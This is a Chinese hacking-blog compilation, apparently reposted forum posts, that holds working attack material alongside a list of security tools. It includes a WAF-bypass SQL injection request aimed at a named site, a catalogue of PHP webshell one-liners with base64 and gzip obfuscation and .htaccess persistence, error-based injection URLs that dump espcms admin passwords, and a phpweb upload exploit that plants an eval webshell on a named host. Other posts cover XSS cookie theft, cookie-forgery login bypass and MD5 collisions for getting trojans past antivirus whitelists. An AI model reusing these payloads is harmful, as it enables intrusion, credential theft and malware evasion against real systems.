最佳的75个安全工具

时间 2021-08-15

标签 php html python mysql linux ios nginx 程序员 web 算法栏目系统安全繁體版

原文原文链接

http://zhan.renren.com/hackthewebsite?tagId=142790&page=2&from=pages&checked=true
WEB***
创新工厂安全宝安全防御绕过漏洞
漏洞详情
简要描述：php

安全宝本质是CND加DDOS防御加web安全防御,其web安全防御功能存在漏洞，能够轻易绕过。
详细说明：html

web安全防御就想到于一个WAF，可是WEB应用过于复杂，很容易就能绕过，如安全宝没法防御80SEC所发现的几种***方法：参考python

http://www.80sec.com/浅谈绕过waf的数种方法.html
漏洞证实：mysql

以下面安全保护的网站www.51qljr.com，若是拦截到SQL注入***是405状态，用下面的包发送SQL注入***将绕过安全保护。linux

GET /xinxi/shownews.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.51qljr.com
Pragma: no-cache
Content-Length: 21
Content-Type: application/x-www-form-urlencodedios

id=572' and 1=1--
修复方案：nginx

web应用太复杂，还有各类复杂场景能够绕过相似的安全防御。
版权声明：转载请注明来源 rayh4c@乌云程序员

# ***
# web***web

2算法

分享回复3 喜欢

Nginx 0day 空字节执行漏洞

Nginx %00空字节执行任意代码(php)漏洞

nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 <= 0.8.37

Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx
Ngnix在遇到%00空字节时与后端FastCGI处理不一致，致使能够在图片中嵌入PHP代码而后经过访问xxx.jpg%00.php来执行其中的代码

In vulnerable versions of nginx, null bytes are allowed in URIs by default

(their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).
Individual modules have the ability to opt-out of handling URIs with null bytes.

However, not all of them do; in particular, the FastCGI module does not.

# ***
# web***

分享回复喜欢

同志们~点击一下本站上面的分享按钮吧~~大家给力，我就给力，更多最新最ing 的***咨询，技术~关注web***小站吧~

# web***
# ***

分享回复1 喜欢

0day搜索和下载站点

http://mukki.org/
http://www.newreleases.ws/0day/

http://www.wooyun.org/

之后慢慢更新

# web***
# ***

分享回复喜欢

Backtrack5 R1-cn蓝盾汉化测试版镜像下载

下载地址：

ed2k://|file|BT5-R1-CN.iso|2265214976|1B1B0C02481141A7E397E36B101E1AAF|h=L5WZNET7TAMXYISSLQDWHP6CR7VD535V|/

安装以及使用说明：

http://115.com/file/aqv3qky6#BackTrack%E4%B8%AD%E6%96%87%E6%8C%87%E5%8D%97V8.pdf

# ***
# web***

分享3 回复6 喜欢

最佳的75个安全工具

最佳的75个安全工具工具：Nessus（最好的开放源代码风险评估工具）
网址：http://www.nessus.org/
类别：开放源码
平台：Linux/BSD/Unix
简介：Nessus是一款能够运行在Linux、BSD、Solaris以及其余一些系统上
的远程安全扫描软件。它是多线程、基于插入式的软件，拥有很好的 GTK界面，可以完成超过1200
项的远程安全检查，具备强大的报告输出能力，能够产生HTML、XML、LaTeX和ASCII文本等格式的安
全报告，而且会为每个发现的安全问题提出解决建议。
--------------------------------------------------------------------------------
工具：Ethereal（网络协议检测工具）
网址：http://www.ethereal.com/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Ethereal是一款免费的网络协议分析程序，支持Unix、
Windows。借助这个程序，你既能够直接从网络上抓取数据进行分析，也能够对由其余嗅探器
抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每个数据包的摘要
和详细信息。Ethereal有多种强大的特征，如支持几乎全部的协议、丰富的过滤语言、易于查看TCP
会话经重构后的数据流等。
--------------------------------------------------------------------------------
工具：Snort（免费的***检测系统）
网址：http://www.snort.org/
类别：
开放源码
平台：Linux/BSD/Unix/Windows
简介：Snort是一款轻量级的网络***检测系统，
可以在IP网络上进行实时的流量分析和数据包记录。它不只能进行协议分析、内容检索、内容匹配，
并且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI***、SMB探测、操做系统指纹识别等大量的***
或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略，而且提供一个模块化的探测引擎。
--------------------------------------------------------------------------------
工具：Netcat（网络瑞士×××）
网址：http://www.atstake.com/research/tools/network_utilities/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：一个简单而有用的工具，透过使用TCP或UDP协议的网络链接去读写数据。它被设计成一个稳定的后门工具，可以直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，可以创建你须要的几乎全部类型的网络链接，还有几个颇有意思的内置功能。
--------------------------------------------------------------------------------
工具：TCPDump/WinDump（用于网络监测和数据收集的优秀嗅探器）
网址：http://www.tcpdump.org/，http://windump.polito.it/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据
包分析和嗅探工具。它能把匹配规则的数据包的包头给显示出来。你能使用这个工具去查找网络问题或者去监视网络上的情况。WinDump是Tcpdump在Windows平台上的移植版。
--------------------------------------------------------------------------------
工具：Hping2（相似ping的网络探测工具）
网址：http://www.hping.org/
类别：开放源码
平台：Linux/BSD/Unix
简介：hping2能发送自定义的ICMP/UDP/TCP包到目标地址而且显示包的响应状况。它有一
个方便的traceroute模式，而且支持IP分片。这个工具在traceroute、ping和探测防火墙后的主机时特别有用。

工具：Firewalk（高级的traceroute）
网址：http://www.packetfactory.net/projects/firewalk/
类别：开放源码
平台：Linux/BSD/Unix
简介：Firewalk使用相似traceroute的技术来分析IP
包的响应，从而测定网关的访问控制列表和绘制网络图。2002年10月，这个一流的工具在原来的基础
上进行了从新开发。须要注意到的是，Firewalk里面的大多数功能也能由Hping2的traceroute选项来实现。
--------------------------------------------------------------------------------
工具：Cain & Abel（穷人的L0phtcrack）
网址：http://www.oxid.it/cain.html
类别：免费
平台：Windows
简介：Cain & Abel是一个针对Microsoft操做系统的免费
口令恢复工具。它经过以下多种方式轻松地实现口令恢复：网络嗅探、破解加密口令（使用字典或强
行***）、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议等。源代码不公开。
--------------------------------------------------------------------------------
工具：
XProbe2（主动操做系统指纹识别工具）
网址：http://www.sys-security.com/html/projects/X.html
类别：开放源码
平台：Linux/BSD/Unix
简介：XProbe是一款测定远程主机操做系统类型
的工具。它依靠与一个签名数据库的模糊匹配以及合理的推测来肯定远程操做系统的类型，利用
ICMP协议进行操做系统指纹识别是它的独到之处。
--------------------------------------------------------------------------------------------------------------------------------------------------------------
工具：SolarWinds Toolsets（大量的网络发现、监视、***工具）
网址：http://www.solarwinds.net/
类别：商业
平台：Windows
简介：SolarWinds包含大量适合系统管理员作特殊用途的工具，与安全相关的工具包括许多的网
络发现扫描器（network discovery scanner）和一个SNMP强力破解器。
--------------------------------------------------------------------------------
工具：NGrep（方便的包匹配和显示工具）
网址：http://www.packetfactory.net/projects/ngrep/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：NGrep在网络层实现了GNU grep的大多数功能，基于pcap，可使你经过指定扩展的正则表达
式或十六进制表达式去匹配网络上的数据流量。它当前可以识别
流经以太网、PPP、 SLIP、FDDI、令牌网和回环设备上的TCP、UDP和ICMP数据包，而且和其余
常见的嗅探工具（如tcpdump和snoop）同样，理解bpf 过滤机制。
--------------------------------------------------------------------------------
工具：Perl/Python（脚本语言）
网址：http://www.perl.org，http://www.python.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：当咱们使用那些已经开发好的安全工具来处理任务时，别忘了能
本身写出（或修改）安全程序也是一件很是重要的事情。利用Perl和Python
能很是容易地写出用
于系统测试、exploit和修补的脚本程序，使用包含Net::RawIP和协议实现等模块的CPAN
（Comprehensive Perl Archive Network：http://www.cpan.org/）
或相似的档案能帮助咱们比较容易地进行相关的开发。
--------------------------------------------------------------------------------
工具：THC-Amap（应用程序指纹识别扫描器）
网址：http://www.thc.org/releases.php
类别：开放源码
平台：Linux/BSD/Unix
简介：由THC开发的Amap是一个功能强大的扫描器，它经过探测端口响应的
应用程序指纹数据来识别应用程序和服务，远甚于经过缺省端口号来判断应用程序和服务的方法。
--------------------------------------------------------------------------------
工具：OpenSSL（最为重要的SSL/TLS加密库）
网址：http://www.openssl.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：OpenSSL项目是共同努力开发出来的一个健全的、商业级的、
全开放的和开放源代码的工具包，用于实现接层协议(SSL v2/v3)和传输层安全协议(TLS v1)
以及造成一个功效完整的通用加密库。该项目由全世界范围内志愿者组成的团体一块儿管理，
他们使用Internet去交流、设计和开发这个 OpenSSL工具和相关的文档。
工具：NTop（网络使用情况监测软件）
网址：http://www.ntop.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Ntop是一款显示网络使用情况的流量监测软件，相似于
UNIX平台上监视系统进程的top命令。在交互模式下，ntop会将网络的使用情况显示在用户的终端上；
在Web模式下，ntop会作为一个web服务器，建立包含网络情况的HTML网页返回给用户。
--------------------------------------------------------------------------------
工具：Nemesis（命令行式的UNIX网络信息包插入套件）
网址：http://www.packetfactory.net/projects/nemesis/
类别：开放源码
平台：Linux/BSD/Unix
简介：Nemesis项目是为了开发一个UNIX/Linux系统上基于命令行的、方便人们使用的IP栈，
它能够自定义数据包、插入数据包、进行协议***等，
是一个很好的测试防火墙、***检测系统、路由器和其余网络设备的工具。若是你对Nemesis感兴趣，
那么你也可能须要看看hping2，这二者补相互之不足。
--------------------------------------------------------------------------------
工具：LSOF（列出打开的文件）
网址：ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
类别：
开放源码
平台：Linux/BSD/Unix
简介：LSOF是针对Unix的诊断和分析工具，它能显示出由
系统里正在运行的进程所打开的文件，也能显示出每个进程的通信socket。
-------------------------------------------------------------------------------
工具：Hunt（Linux平台上高级的包嗅探和会话劫持工具）
网址：http://lin.fsid.cvut.cz/~kra/index.html#HUNT
类别：开放源码
平台：Linux
简介：Hunt能监视、劫持、重设网络上的TCP链接，
在以太网上使用才有做用，而且含有监视交换链接的主动机制，以及包括可选的ARP转播和劫持成功
后的链接同步等高级特征。
--------------------------------------------------------------------------------
工具：Honeyd（你我的的honeynet，http://www.honeynet.org/）
网址：http://www.citi.umich.edu/u/provos/honeyd/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Honeyd是一个能在网络上建立虚拟主机的小小后
台程序，虚拟主机能被配置成运行任意的服务，而且洽当的服务TCP特性以至他们看起来就像是运行
在某个特定版本的操做系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址，而且
能够对虚似主机进行ping、traceroute。虚拟主机上任何类型的服务均可以依照一个简单的配置文
件进行模拟。Honeyd也能够对一台主机作代理服务，而不是模拟它。
--------------------------------------------------------------------------------
工具：Achilles（能够修改http会话包的代理程序）
网址：http://packetstormsecurity.nl/filedesc/achilles-0-27.zip.html
类别：开放源码
平台：Windows
简介：Achilles是一个设计用来测试web应用程序安
全性的工具。它是一个代理服务器，在一个HTTP会话中扮演着“中间人”（man-in- the-middle）的角
色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包，但Achilles却载取发向任
一方的HTTP 会话数据，而且在转发数据前可让用户修改这些数据。
--------------------------------------------------------------------------------
工具：Brutus（网络认证的强行破解工具）
网址：http://www.hoobie.net/brutus/
类别：免费
平台：Windows
简介：Brutus是一款对远程服务器的网络服务进行口令猜解的工具，支持字典***和组合***，
支持的网络应用包括HTTP、POP三、FTP、SMB、TELNET、IMAP、NTP等。源代码不公开。
UNIX系统上的THC-Hydra有相似的功能。
--------------------------------------------------------------------------------
工具：Stunnel（一个多种用途的SSL加密外壳）
网址：http://www.stunnel.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Stunnel程序被设计用来作为本地客户端和远程服务器间的SSL加
密外壳。它能在POP二、POP三、IMAP等使用inetd后台进程的服务器上增长SSL功能，而且不会影响
到程序源代码。它使用OpenSSL或SSLeay库创建SSL会话链接。
--------------------------------------------------------------------------------
工具：Paketto Keiretsu（极端的TCP/IP）
网址：http://www.doxpara.com/paketto
类别：开放源码
平台：Linux/BSD/Unix
简介：Paketto Keiretsu是一组使用新式的不常见的策略去操做TCP/IP网
络的工具集合，开发的最初本意是为了在现有TCP/IP架构里去实现一些功能，但如今已经远远超出
了最初的本意。包含的工具备：Scanrand，一个罕见的快速的网络服务和拓朴发现系统；Minewt，一
个NAT/MAT路由器； linkcat，把以太网链路作为标准的输入输出；Paratrace，不产生新的连
接就能追踪网络路径；Phentropy，使用OpenQVIS在三维拓朴空间里能绘制出任意总量的数据源图形。

工具：Fragroute（破坏***检测系统最强大的工具）
网址：http://www.m&#111nkey.org/~dugsong/fragroute/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Fragroute可以截取、修改和重写向外发送的报文，
实现了大部分的IDS***功能。Fragroute起重要做用的是一个简单的规则设置语言，以它去实现延迟
、复制、丢弃、碎片、重叠、打印、重排、分割、源路由或其余一些向目标主机发送数据包的***。
这个工具开发的本意是去测试***检测系统、防火墙、基本的TCP/IP栈的行为。像Dsniff、Libdnet
同样，这个优秀的工具也是由Dug Song开发的。
--------------------------------------------------------------------------------
工具：SPIKE Proxy
网址：http://www.immunitysec.com/spikeproxy.html
类别：
开放源码
平台：Linux/BSD/Unix/Windows
简介：Spike Proxy是一个开放源代码的HTTP代
理程序，用于发现web站点的安全缺陷。它是Spike应用程序测试套件
（http://www.immunitysec.com/spike.html）的一部份，支
持SQL插入检测、web站点检测、登陆表单暴力破解、溢出检测和字典穷举***检测等。
-------------------------------------------------------------------------------
工具：THC-Hydra（网络认证的破解工具）
网址：http://www.thc.org/releases.php
类别：开放源码
平台：Linux/BSD/Unix
简介：这个工具能对须要网络登陆的系统进行快速的字典***，
包括FTP、POP三、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks五、PCNFS等，
支持SSL，而且如今是Nessus风险评估工具的一部份。
--------------------------------------------------------------------------------
其余的25个最佳安全工具：
OpenBSD，http://www.openbsd.org/：安全可靠的操做系统。
TCP Wrappers，ftp://ftp.porcupine.org/pub/security/index.html：一流
的IP访问控制和日志的实现机制。
pwdump3，http://www.polivec.com/pwdump3.html：
获取本地或远程Windows主机的口令哈希，而无论是否安装了syskey。
LibNet，http://www.packetfactory.net/libnet/: 容许程序员去构造
和插入网络数据包的高水平开发函数库.
IpTraf，http://cebu.mozcom.com/riker/iptraf/: IP网络监控软件。
Fping，http://www.fping.com/：一次能够ping多个IP地址的扫描程序。
Bastille，http://www.bastille-linux.org/：加强系统安全性的脚本程序，支持Linux,
Mac OS X和HP-UX操做系统。
Winfingerprint，http://winfingerprint.sourceforge.net/: 一款基于Win32的
高级远程系统扫描器。
TCPTraceroute，http://michael.toren.net/code/tcptraceroute/:使用TCP SYN
包实现traceroute的工具。
Shadow Security Scanner，http://www.safety-lab.com/en2/products/1.htm：一款商业化
的风险评估工具。
pf，http://www.benzedrine.cx/pf.html：OpenBSD系统内颇有特点
的包过滤防火墙。
LIDS，http://www.lids.org/：Linux内核上的***检测和***防护系统。
hfnetchk，http://www.microsoft.com/technet/treeview/default.asp?
rl=/technet/security/tools/tools/hfnetchk.asp：微软发布的用于
检查网络上Windows主机
补丁安装状况的工具。
etherape，http://etherape.sourceforge.net/：继流量监测软件etherman以后又一个
支持unix的图形化网络情况监测软件。
dig，http://www.isc.org/products/BIND/：Bind附带的DNS查询工具。
Crack/Cracklib，
http://www.users.dircon.co.uk/~crypto/：一流的本地口令破解器。
cheops/cheops-ng，http://www.marko.net/cheops/，
http://cheops-ng.sourceforge.net/：
绘制本地或远程网络的网络图，而且也能识别主机的操做系统类型。
zone alarm，
http://www.zonelabs.com/：Windows平台上的我的防火墙软件。
Visual Route，http://www.visualware.com/visualroute/index.html：
获取traceroute/whois数据，而且绘制出数据包通过的网络路线在世界地图上的位置。
The Coroner`s Toolkit (TCT)，http://www.fish.com/tct/：运行于Unix系统上的
文件系统检查及紧急修复工具集。
tcpreplay，http://tcpreplay.sourceforge.net/：
能把tcpdump或snoop保存下来的流量监测文件在任意点进行回放的工具。
snoop，http://www.spitzner.net/snoop.html：Solaris系统附带的
网络嗅探工具。
putty，
target=_blank>http://www.chiark.greenend.org.uk/~sgtatham/putty/：
Windows平台上优秀的SSH客户端。
pstools，http://www.sysinternals.com/ntw2k/freeware/pstools.shtml：
一套用于管理Windows系统的免费命令行工具。
arpwatch，http://www-nrg.ee.lbl.gov/：主要用来检测
mac地址和ip地址对应关系的工具

# ***
# web***

分享2 回复3 喜欢

【转载】土司真抠门免费了把多年的tuo裤脚本都送出来了

昨天小狼想我问Oracle的***脚本我看看貌似土司都木有我发个集合的吧

mssql

mysql

Oracle

的所有打包了

下载地址：

http://www.ctdisk.com/file/3289059

# ***
# web***

分享回复喜欢

【转载】浅析php后门***

php后门***对你们来讲一点都不陌生吧，可是它的种类您又知多少呢？
本文为您浅析说明一些php后门***经常使用的函数

php后门***经常使用的函数大体上可分为四种类型：
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

1. 执行系统命令:

system 函数

//test.php?cmd=ls
system($_GET[cmd]);

passthru 函数

//test.php?cmd=ls
passthru($_GET[cmd]);

shell_exec 函数

//test.php?cmd=ls
echo shell_exec($_GET[cmd]);

exec 函数

//test.php?cmd=ls
$arr = array();
exec($_GET[cmd],$arr);
print_r($arr);

popen 函数

//test.php?cmd=ls
$handle = popen('$_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);

proc_open 函数

//test.php?cmd=ls
$descriptorspec = array(
       0 => array('pipe', 'r'),
       1 => array('pipe', 'w'),
       2 => array('pipe', 'w'),
    );
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1],1024),"\n"));
print_r($output);

2. 代码执行与加密:

eval 函数

//最多见的一句话***
eval($_POST[cmd]);

base64_decode 函数

//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

gzinflate 函数

//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));

gzuncompress 函数

//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

gzdecode 函数

//为了免杀及隐藏而加密代码
//密文: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));

str_rot13 函数

//为了免杀及隐藏而加密代码
//密文: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));

assert 函数

//相似eval函数
assert($_POST[cmd]);

call_user_func 函数

//使用call_user_func调用assert
call_user_func('assert',$_POST[cmd]);

call_user_func 函数

//使用call_user_func调用任意函数
//test.php?a=assert&cmd=phpinfo()
call_user_func($_GET[a],$_REQUEST[cmd]);

组合代码

//组合方式调用任意函数
//test.php?a=assert&cmd=phpinfo()
$_GET[a]($_REQUEST[cmd]);

3. 文件包含与生成:

require 函数

//包含任意文件
//test.php?file=123.jpg
require($_GET[file]);

require_once 函数

//包含任意文件
//test.php?file=123.jpg
require_once($_GET[file]);

include 函数

//包含任意文件
//test.php?file=123.jpg
include($_GET[file]);

include_once 函数

//包含任意文件
//test.php?file=123.jpg
include_once($_GET[file]);

file_get_contents 函数

//读取任意文件
//test.php?f=config.inc.php
echo file_get_contents($_GET['f']);

file_put_contents 函数

//生成任意内容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
file_put_contents($_GET[a],$_GET[b]);

fputs 函数

//生成任意内容文件
//a=test.php&b=<?php eval($_POST[cmd]);?>
fputs(fopen($_GET[a],"w"),$_GET[b]);

4. .htaccess:

SetHandler

//可将php代码存于非php后缀文件,例: x.jpg
//将如下代码写入.htaccess中
//链接x.jpg便可启动后门***
<FilesMatch "x.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

auto_prepend_file

//可将php代码存于非php后缀文件,例: 123.gif
//将如下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门***
//可在不更改站点源代码的状况下记录全部$_REQUEST的值，也可批量挂马
php_value auto_prepend_file c:/apache2/htdocs/123.gif

auto_append_file

//相似auto_prepend_file
//可将php代码存于非php后缀文件,例: 123.gif
//将如下代码写入.htaccess中, 文件路径必须是绝对路径
//访问网站上任何php文件都会启动该php后门***
php_value auto_append_file c:/apache2/htdocs/123.gif

另外也针对以上特征码写了一个php web版线上扫描工具

http://www.t00ls.net/viewthread.php?tid=18951

# ***
# web***

分享1 回复喜欢

【转载】科迅官方XSS漏洞

用户后台发信箱标题直接插入JS脚本S

收信者即会中招，偶对管理员进行了测试！不过2分钟就收到信了！

科迅CMS会将用户、密码、认证码存入COOKIE。。。

而后你懂得！！！

漏洞已反馈，发帖之时还未修复，想X的童鞋速度！

# ***
# web***

分享回复喜欢

你们帮忙推荐推荐啊~~人越多才有精气神来发0day！！你们给力才是真的给力！

# web***

分享回复7 喜欢

[【转载T00ls】] 随风分类信息程序1.4COOKIES欺骗

[【原创】] 随风分类信息程序1.4COOKIES欺骗

admin/index.php

<? require_once("../conn.php");?>

$user=cstr($_POST["user"]);

$pass=cstr($_POST["pass"]);

if($_GET["post"]=="action"){

$sql=mysql_query("select * from config where s_user='".$user."' and s_pass='".$pass."'");

$rs=mysql_fetch_array($sql);

if($rs["id"]==""){

echo "<script>alert('用户名或密码错误，请重新输入！ (默认密码是:123456)');window.location.href='index.php';</script>";

exit;

}else{

setcookie("admin","windows250523691",time()+3600);

echo "<script>window.location.href='admin.php';</script>";

exit;

}

setcookie("admin","windows250523691",time()+3600);

# ***
# web***

分享回复喜欢

[【Exp】] espcms 0day

为证实我一直默默在T00LS..

发个小0day!!

百度关键字：inurl:index.php?ac=article&at=read&did=

注入点(爆表前缀）：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密码：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    # ***
    # web***
    # 牛b

分享回复1 喜欢

phpweb 注射、上传、安装文件漏洞、万能密码

############################################################################## Title: phpweb 注射、上传、安装文件漏洞、万能密码# Time：2011-10-15# Team: # Author: lostowlf#############################################################################home: hi.baidu.com/nginxshell-----------------------exploit-------------------******sqlinjection******* http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}http://www.phpweb.net/photo/clas ... mp;key=&myord=1 {sqlinjection}***********getshell********POST /kedit/upload_cgi/upload.php HTTP/1.0www.90sec.org" Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*Referer: http://phpweb.net/news/admin/new ... p;pid=all&page= Accept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7db516c0118UA-CPU: x86Pragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: lib.jlnu.edu.cnProxy-Connection: Keep-AliveCookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. VContent-Length: 6620-----------------------------7db516c0118Content-Disposition: form-data; name="fileName"201110121318373662005.php;.jpg-----------------------------7db516c0118Content-Disposition: form-data; name="attachPath"news/pics/-----------------------------7db516c0118Content-Disposition: form-data; name="fileData"; filename="C:\6.gif"Content-Type: p_w_picpath/gifgif89a<?php fputs(fopen('test.php','w'),'<?php eval($_POST[lostwolf])?>');?>*********install file:**********http://www.url.com/base/install/*********admin********www.url.com/admin.phpusername: admin 'or '1'='1username: admin 'or '1'='1-----------------------exploit end -------------------

    # web***
    # ***
    # python

分享回复喜欢

使用 MD5 碰撞算法假装***，躲过杀毒软件查杀，加入360白名单

MD5 碰撞算法假装***，躲过杀毒软件查杀，加入360白名单。MD5 碰撞发生器 v1.5，fastcoll_v1.0.0.5.exe，MD5 Collision Generator v1.5，根据王小云教授的算法写的MD5碰撞的程序。

快速MD5碰撞生成器，王小云改进版。这个生成器根据“构造前缀碰撞法”能够生成两个不一样的文件，而这两文件的md5 sum倒是同样的。

构造前缀碰撞法可制做两个内容不一样但具备相同MD5验证码的文件。

----------------------------------------------------------------

刚才在 T00ls.net 看到个帖子，内容以下（内容有修改，去除了一些不重要的回帖）：

楼主：

年前购买了一个免杀远*,300￥一个月,免杀效果确实牛B，过国内外主流杀软，在手3个月都没杀，大概5月份360更新后要提示了，而后联系客服更新，这样陆陆续续更新了几回，效果都很好，9月底，360更新后所有杀了,而后联系客服,客服说之前的技术被360分析出来了，而后让咱们等待2周时间，那边技术在研发新的技术，国庆节后客服发过来一个更新的远*,我测试之后都过，在360进程查看器和网络链接查看都提示文件安全，但过了一天360又报文件为***文件，我再次联系客服，客服让等1个小时，所技术正在解决,而后一个小时后，360又不杀了，提示安全（注:马仍是之前的马，没有更新过,MD5这些都是同样的！）

难道远控的技术和360!!!,

求解！！！

楼主：

我想了解的是为何360杀了，而后一个小时后，一样的文件360又不杀了，其余什么认证，地下工做者我就不想去了解了

路人甲：

二种可能 360内部人卖马，360被日了

路人乙：

1.360内部人卖马
2.360被日了
3.lz傻了？

路人丙：

360收黑钱，不干人事，鉴定完毕。
还有你把这个马发别人那看杀不

楼主：

回复路人丙

都不杀，已经测试过了

路人丁：

万一是远控的云端也在作某种远程更新呢？不能说MD5不变，就是有JQ，无凭无据。

路人戊：

exe的MD5不变，不表明exe确定不下载新的DLL或其余的模块吧？

本人回复：

应该是认证环节被人有空子可钻。。

本人回复：

我认为，最有可能的是认证环节，也就是360的白名单认证制度。

前提条件是，360是使用标准MD5值进行程序惟一性验证。

但MD5有个问题就是，碰撞算法，能够产生两个MD5相同、但功能不相同的程序。

把正常的程序提交上去后，让360认证，认证完毕，加到白名单，另外那个也“免杀”了。

据我所知，一年前（其实是2005年左右的）出了一个东西，自动生成同样MD5值的程序的工具。

并且貌似支持根据指定程序生成一个同样MD5值的程序。

若是360不是使用标准MD5的话，其余算法也有此可能。

本人回复：

MD5 Test_A.exe：与 B 的 MD5 相同，但功能不一样。
MD5 Test_B.exe：与 A 的 MD5 相同，但功能不一样。

---------------------------------------------

MD5 Test_A.exe：
MD5：F9E99485F226E07627D5180EF95FA473
大小：20.1 KB (20,608 字节)

MD5 Test_B.exe：
MD5：F9E99485F226E07627D5180EF95FA473
大小：20.1 KB (20,608 字节)

（2011-10-11 5:48:05 补充：而后我跑去写了个小程序，MD5值同样，但功能不一样，原帖以附件的形式存在，这里我给出下载地址。）

MD5_碰撞测试程序_示例程序.rar：http://115.com/file/clonsfie

实际上从2004年8月17，我国山东大学王晓云教授破解MD5的论文发布后，关于这个MD5碰撞算法的话题就不断，几年以后，就没人讨论了，在咱们这一代不少人都没据说过，我也是一两年前知道MD5碰撞算法，当时查阅了部分资料，了解了个大概。

我又把这个话题拉出来讨论下，不过此次是讨论的***免杀方面的。。。实际上也和免杀无关，只是从免杀想到的。

如上贴内容所示，若是能成功伪造MD5，那么躲过杀毒软件查杀，甚至加入白名单，都不是问题了。

题外话：我不知道360是否是使用的标准MD5算法验证文件的，我从没注意过。若是是的话，那么，如今杀毒软件中好像就只有360这个白痴还使用标准MD5算法验证文件……

不过从如下内容来看、、360还真的是用MD5算法验证文件的、、、真坑爹……

如下内容转自几年前其余人发表的文章：

如下是引用片断：

原来我老是很自信地觉得:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 同样,却又都能正常运行,而且能够作彻底不一样的事情么?
答:还真的能够.

http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe

http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe

这两个程序会在屏幕上打印出不一样的字符，可是它们的 MD5 都是同样的。

通读其论文后摘要以下：

这几位密码学家使用的是“构造前缀碰撞法”（chosen-prefix collisions）来进行这次***（是王小云所使用的***方法的改进版本）。

他们所使用的计算机是一台 Sony PS3，且仅用了不到两天。

他们的结论：MD5 算法不该再被用于任何软件完整性检查或代码签名的用途。

另：如今，若是仅仅是想要生成 MD5 相同而内容不一样的文件的话，在任何主流配置的电脑上用几秒钟就能够完成了。

